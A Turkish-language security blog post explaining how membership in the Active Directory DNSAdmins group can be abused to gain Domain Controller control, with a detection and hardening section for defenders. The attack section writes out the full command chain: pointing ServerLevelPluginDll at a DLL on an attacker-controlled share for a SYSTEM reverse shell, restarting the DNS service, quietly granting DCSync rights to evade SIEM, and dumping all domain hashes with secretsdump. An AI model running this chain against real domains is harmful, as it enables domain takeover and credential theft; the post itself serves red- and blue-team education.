Published on

DNSAdmins’den Domain Admin’e: Active Directory’de Feature Abuse ile Yetki Yükseltme

Authors

DNSAdmins’den Domain Admin’e: Feature Abuse ile Yetki Yükseltme

Siber güvenlikte sıkça duyulan bir söz vardır "Saldırganlar hataları (bug), profesyoneller özellikleri (feature) kullanır." Active Directory ortamlarında DNSAdmins grubuna erişimi olan bir saldırganın, Microsoft’un sunduğu tamamen yasal bir özelliği kötüye kullanarak (Feature Abuse) nasıl Domain Controller’ı ele geçirebileceğini bu yazıda derinlemesine inceliyoruz.

Bu yazı, hem red team hem de blue team için operasyonel açıdan kritik noktaları içerir.

DNSAdmins Grubunu Tehlikeli Yapan Nedir?

DNSAdmins grubu, DNS servisi üzerinde yönetim yetkisine sahip kullanıcıları içerir. Bu grubun tehlikeli olmasının iki temel nedeni vardır:

  • DNS servisi SYSTEM yetkisiyle çalışır.
  • DNS yöneticileri, DNS servisine harici DLL yükleyebilir.

Bu iki özellik birleştiğinde ortaya ciddi bir sonuç çıkar: Eğer saldırgan DNS servisine kendi yüklediği zararlı bir DLL’i okutursa, bu DLL SYSTEM haklarıyla çalışır. SYSTEM yetkisi Domain Controller’da zaten en tepe noktadır.

Adım 1: DLL Injection için Hazırlık

Bu senaryoda saldırganın DNSAdmins grubuna üye labuser kullanıcısını ele geçirdiğini varsayıyoruz.

Amaç, DC üzerindeki DNS servisinin ServerLevelPluginDll parametresini saldırganın istediği DLL’e yönlendirmektir:

dnscmd <DC_IP> /config /serverlevelplugindll \\SALDIRGAN_IP\paylasim\malware.dll

Not: UNC path üzerinden DLL yüklenebildiği kanıtlanmıştır. Böylece dosyayı DC’ye manuel kopyalamanıza gerek kalmaz.

malware.dll genellikle Mimikatz’in modifiye edilmiş mimilib.dll sürümüdür ve çalıştırıldığında saldırgana SYSTEM yetkili reverse shell verir.

Adım 2: DNS Servisini Restart Edip SYSTEM Olmak

DLL’in yüklenmesi için DNS servisinin yeniden başlatılması gerekir:

sc \\<DC_IP> stop dns
sc \\<DC_IP> start dns

Servis açılır açılmaz DLL yüklenir ve saldırgan makinesine SYSTEM yetkili bir kabuk düşer.

Artık Domain Controller sizin kontrolünüzde.

Adım 3: Sessizce Yetki Yükseltme – Gürültüsüz DCSync Yetkisi

Sistemde SYSTEM olduktan sonra çoğu saldırgan heyecanla şu komutu çalıştırır:

net group "Domain Admins" hacker_user /add /domain

Bu çok gürültülüdür. SIEM ürünleri bunu anında algılar.

Bunun yerine profesyonel saldırganlar daha sessiz bir yöntemi tercih eder: ACL Manipülasyonu.

Amaç: Normal kullanıcı labuser’a Domain Controller gibi davranıp DCSync yapabilme yetkisi vermek.

dsacls "DC=korkusuz,DC=local" /G "korkusuz\labuser:CA;Replicating Directory Changes"
dsacls "DC=korkusuz,DC=local" /G "korkusuz\labuser:CA;Replicating Directory Changes All"

Bu işlem loglarda çok daha düşük görünürlük oluşturur.

Adım 4: DCSync ile Hash Çekme

Yetki verilen kullanıcı artık tüm domain’i replike edebilir.

impacket-secretsdump korkusuz.local/labuser:Sifresi123@<DC_IP>

Sonuç: Administrator dahil tüm kullanıcıların NTLM hashleri saldırganın elindedir.

Blue Team – Tespit ve Önleme

Bu saldırıyı engellemek için mavi takımların izlemesi gereken kritik noktalar şunlardır:

1. DNSAdmins Grubu İzlenmeli

Kim eklenmiş, kim çıkarılmış sıkı takip edilmelidir.

2. Registry İzleme

Aşağıdaki anahtar değiştiğinde alarm üretilmelidir:

HKLM:\SYSTEM\CurrentControlSet\services\DNS\Parameters\ServerLevelPluginDll

3. Event Log İzleme

DNS Server loglarında özellikle şu event’lere dikkat edilmelidir:

  • 150
  • 770
  • 541

4. GPO ile Sıkılaştırma

DNSAdmins üyelerini sınırlandırmak için özel GPO politikaları uygulanmalıdır.

Sonuç

Active Directory’de yetki yükseltmenin her zaman bir zafiyeti sömürmek zorunda olmadığını, bazen sistemin kendi sunduğu özelliklerin yanlış yapılandırılmasının bile Domain Controller’ı ele geçirmek için yeterli olduğunu gördük.

DNSAdmins grubu, Microsoft’un sunduğu masum bir özellik ile birleştiğinde domain’in tamamen ele geçirilmesine kapı aralayabilir.

Red Team için güçlü bir saldırı zinciri olan bu teknik, Blue Team için takip edilmesi gereken kritik bir güvenlik kontrolüdür.